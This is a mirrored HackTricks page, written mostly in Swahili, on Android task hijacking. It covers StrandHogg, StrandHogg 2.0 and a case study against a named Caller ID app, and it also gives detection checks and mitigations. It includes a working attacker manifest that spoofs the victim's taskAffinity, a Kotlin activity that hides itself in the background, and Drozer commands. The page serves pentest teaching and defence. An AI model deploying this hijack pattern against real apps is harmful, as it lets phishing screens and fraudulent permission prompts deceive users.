maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md

145 lines
9.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Android Task Hijacking
{{#include ../../banners/hacktricks-training.md}}
## Task, Back Stack and Foreground Activities
Katika Android, **task** kimsingi ni seti ya shughuli ambazo watumiaji huingiliana nazo ili kukamilisha kazi maalum, zimepangwa ndani ya **back stack**. Stack hii inaweka shughuli kulingana na wakati zilifunguliwa, huku shughuli ya hivi karibuni ikionekana juu kama **foreground activity**. Wakati wowote, shughuli hii pekee ndiyo inaonekana kwenye skrini, na kuifanya kuwa sehemu ya **foreground task**.
Hapa kuna muhtasari wa harakati za shughuli:
- **Activity 1** inaanza kama shughuli pekee katika foreground.
- Kuanzisha **Activity 2** kunasukuma **Activity 1** kwenye back stack, na kuleta **Activity 2** kwenye foreground.
- Kuanzisha **Activity 3** kunahamisha **Activity 1** na **Activity 2** zaidi nyuma kwenye stack, huku **Activity 3** ikiwa mbele.
- Kufunga **Activity 3** kunarudisha **Activity 2** kwenye foreground, ikionyesha mfumo wa urambazaji wa kazi wa Android.
![https://developer.android.com/images/fundamentals/diagram_backstack.png](<../../images/image (698).png>)
---
## Task affinity attacks
`taskAffinity` inamwambia Android ni kazi ipi `Activity` itapendelea kuhusika nayo. Wakati shughuli mbili zinashiriki affinity sawa **Android inaruhusiwa kuziunganisha ndani ya back-stack moja hata kama zinatoka kwenye APK tofauti**.
Ikiwa mshambuliaji anaweza kuweka shughuli mbaya kwenye **root** ya stack hiyo, kila wakati mwathirika anapofungua programu halali, UI mbaya itakuwa kitu cha kwanza ambacho mtumiaji anaona bora kwa udukuzi wa taarifa au maombi mabaya ya ruhusa.
Uso wa shambulio ni mpana zaidi kuliko wanavyofikiria waendelezaji wengi kwa sababu **kila shughuli moja kwa moja inapata affinity sawa na jina la kifurushi cha programu** (isipokuwa mendelezaji aweke `android:taskAffinity=""`). Hivyo basi *kufanya chochote* tayari kunafanya programu kuwa wazi kwa udukuzi wa kazi kwenye toleo la Android kabla ya 11.
### Classic "singleTask / StrandHogg" scenario
1. Mshambuliaji anatangaza shughuli yenye:
```xml
<activity android:name=".EvilActivity"
android:exported="true"
android:taskAffinity="com.victim.package"
android:launchMode="singleTask" >
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity>
```
2. Programu mbaya inaanzishwa mara moja ili kazi (ikiwa na affinity iliyodanganywa) iwepo katika kazi za hivi karibuni.
3. Wakati mtumiaji baadaye anafungua programu halisi, Android inagundua tayari kuna kazi ambayo **root affinity inalingana na kifurushi** na inarudisha kazi hiyo kwenye foreground.
4. UI ya mshambuliaji inaonyeshwa kwanza.
### DefaultAffinity (no `singleTask`) variant Caller ID case study
Uthibitisho wa udhaifu ulioandikwa katika programu ya **Caller ID (caller.id.phone.number.block)** unaonyesha kwamba shambulio *pia* linafanya kazi dhidi ya hali ya uzinduzi ya `standard` ya default:
1. Programu ya mshambuliaji inaunda shughuli ya mizizi ya uwongo na mara moja inajificha:
```kotlin
class HackActivity : AppCompatActivity() {
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
moveTaskToBack(true) // keep the task in recents but out of sight
}
}
```
2. Manifest inahitaji tu kunakili kifurushi cha mwathirika ndani ya `taskAffinity`:
```xml
<activity android:name=".HackActivity"
android:exported="true"
android:taskAffinity="com.caller.id.phone.number.block" >
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity>
```
3. Mara tu mtumiaji anapoweka na kufungua programu mbaya **mara moja**, kazi ambayo affinity yake inalingana na kifurushi cha mwathirika inakuwepo (lakini inakaa nyuma).
4. Wakati programu halisi ya Caller ID inazinduliwa, Android inatumia tena kazi hiyo na kuleta `HackActivity` kwenye foreground → dirisha la udukuzi/rubani mbaya.
> NOTE: Kuanzia na **Android 11 (API 30)** mfumo hauweki vifurushi viwili ambavyo si sehemu ya UID moja kwenye kazi moja kwa default, ikipunguza toleo hili maalum. Matoleo ya zamani yanaendelea kuwa hatarini.
---
### StrandHogg 2.0 (CVE-2020-0096) Reflection-based task hijack
Bulletin ya usalama ya Google ya Mei-2020 ilirekebisha toleo la juu zaidi linaloitwa **StrandHogg 2.0**. Udukuzi **hauitegemei `taskAffinity` kabisa**; badala yake inatumia *reflection* kuingiza shughuli ya mshambuliaji juu ya *kila* kazi inayotembea, ikipita kabisa kizuizi cha “shared-UID” kilichowekwa na Android 11.
Mambo muhimu:
* Programu mbaya isiyo na ruhusa inaweza, mara tu ikifunguliwa, kuzunguka kazi zinazotembea na kuita APIs zilizofichwa ili **kuhamasisha** shughuli yake mwenyewe kwenye kazi yoyote.
* Kwa sababu shughuli inaingizwa baada ya muda wa kukimbia, wala `launchMode` wala uchambuzi wa static wa manifest hauwezi kugundua shambulio kabla.
* Imefanyiwa marekebisho kwa kurudisha ukaguzi kwenye **Android 8.0/8.1/9** (Mei 2020 SPL). **Android 10 na baadaye hazihusiki.**
Ugunduzi kwenye vifaa vilivyorekebishwa kabla unaweza kufanywa kwa `adb shell dumpsys activity activities` na kuangalia shughuli za kushuku ambazo jina la kifurushi kinatofautiana na *affinity* ya kazi.
Kuzuia kwa vifaa vya zamani ni sawa na udukuzi wa Kazi wa kawaida **pamoja na** uthibitisho wa wakati wa kukimbia (kwa mfano, kuita [`ActivityManager#getRunningTasks`](https://developer.android.com/reference/android/app/ActivityManager#getRunningTasks(int)) na kuthibitisha jina lako la kifurushi).
---
## Detection & Exploitation checklist
1. **Static review** Pull `AndroidManifest.xml` kutoka APK lengwa na kuangalia kwamba kila `<activity>` (au kipengele cha jumla `<application>`) kina `android:taskAffinity=""` (bila maudhui) **au** thamani iliyobinafsishwa. Zana kama:
```bash
# Using apkanalyzer (Android SDK)
apkanalyzer manifest print app.apk | grep -i taskaffinity
# Using AXMLPrinter2
java -jar AXMLPrinter2.jar AndroidManifest.xml | grep taskAffinity
```
2. **Dynamic review** Kwenye kifaa fungua programu lengwa na orodhesha kazi:
```bash
adb shell dumpsys activity activities | grep -A3 "TASK" | grep -E "Root|affinity"
```
Kazi ambayo root affinity inalingana na kifurushi cha mwathirika lakini shughuli yake ya juu inahusiana na kifurushi *tofauti* ni bendera nyekundu.
3. Tengeneza programu mbaya kama ilivyoelezwa hapo juu, au tumia **[Drozer](https://github.com/WithSecureLabs/drozer)**:
```bash
drozer console connect
run app.activity.start --component com.victim/.MainActivity --action android.intent.action.MAIN
run app.activity.info com.victim
```
---
## Mitigation
Waendelezaji wanapaswa:
* Kuweka wazi `android:taskAffinity=""` kwenye kiwango cha `<application>` (inapendekezwa) **au** kutoa kila shughuli affinity ya kipekee, ya kibinafsi.
* Kwa skrini zenye nyeti sana, changanya hapo juu na `android:launchMode="singleInstance"` au ulinzi wa kisasa wa [`setLaunchMode`](https://developer.android.com/reference/android/content/pm/ActivityInfo#launchMode).
* Pandisha `targetSdkVersion` ya programu na kutekeleza mabadiliko ya tabia ya **Android 11** ambapo kazi hazishirikiwa kati ya vifurushi kwa default.
* Lenga **Android 12 (API 31) au zaidi** ili sifa ya lazima `android:exported` ilazimishe waendelezaji kukagua kila kipengele kinachoweza kufikiwa kutoka nje.
* Fikiria kujilinda wakati wa kukimbia: mara kwa mara uliza `ActivityTaskManager` ili kuhakikisha kwamba kifurushi cha shughuli yako ya juu kinalingana na chako.
---
## Related UI-Hijacking techniques
Udukuzi wa kazi mara nyingi unachanganywa na au kubadilishwa na **tapjacking** (udanganyifu wa UI wa overlay). Utafiti wa 2025 **TapTrap** ulionyesha kwamba shughuli za *animation-driven* zisizo na uwazi zinaweza kupita vizuizi vya overlay-touch vilivyowekwa katika Android 1214 na bado kuwadanganya watumiaji kutoa ruhusa hatari. Ingawa TapTrap si kwa usahihi *task* hijacking, lengo la mwisho (kuvutia kubonyeza) ni sawa hivyo tathmini za kisasa zinapaswa kuangalia uso wote wa shambulio.
---
## References
- [https://blog.dixitaditya.com/android-task-hijacking/](https://blog.dixitaditya.com/android-task-hijacking/)
- [https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html)
- [Android Manifest Misconfiguration Leading to Task Hijacking in Caller ID app](https://github.com/KMov-g/androidapps/blob/main/caller.id.phone.number.block.md)
- [https://medium.com/mobile-app-development-publication/the-risk-of-android-strandhogg-security-issue-and-how-it-can-be-mitigated-80d2ddb4af06](https://medium.com/mobile-app-development-publication/the-risk-of-android-strandhogg-security-issue-and-how-it-can-be-mitigated-80d2ddb4af06)
- [Promon StrandHogg 2.0 (CVE-2020-0096) technical write-up](https://promon.io/resources/downloads/strandhogg-2-0-new-serious-android-vulnerability)
- [USENIX 2025 TapTrap: Animation-Driven Tapjacking on Android](https://www.usenix.org/conference/usenixsecurity25/presentation/beer)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink